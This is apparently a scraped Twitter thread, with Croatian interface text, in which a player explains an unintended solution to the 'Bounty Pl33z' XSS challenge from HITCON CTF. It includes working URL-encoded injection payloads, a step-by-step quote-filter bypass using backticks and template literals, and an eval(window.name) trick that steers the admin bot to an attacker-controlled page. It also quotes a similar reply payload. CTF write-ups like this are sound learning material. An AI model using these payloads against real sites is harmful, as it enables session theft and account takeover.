Where instead alert(1337) I used eval(name) and redirected admin to my website with this bypass: http://3.114.5.202/fd.php?q=trnq。cf? which set http://window.name property.
Prikaži ovu nit
My team with myself included solved all 
from this year #hitcon ctf. I also managed to get the first blood on Bounty Pl33z with this unintended solution :)
http://3.114.5.202/fd.php?q=%60%7D%2b%22%2balert(1337);x=%60%7D%7B(class%20$%7By=%60
-
-
-
1. I bypassed " and ' filter (it only allowed you to use them once) with backticks ` 2. I kept one big string via ${y=` that creates another context and which was closed with `} in each injection point 3. I inserted class keyword that allows define ${} as class 4. {( closes code.pic.twitter.com/VjRuQ0f0xI
Prikaži ovu nit
Kraj razgovora
Novi razgovor -
-
-
here mine, pretty the same ", ` position http://3.114.5.202/fd.php?q=${alert()}`-"-(`${`
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
-
-
This is totally mind-blowing.
I played with parentheses and brackets for a while but didn't manage to craft something like this.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.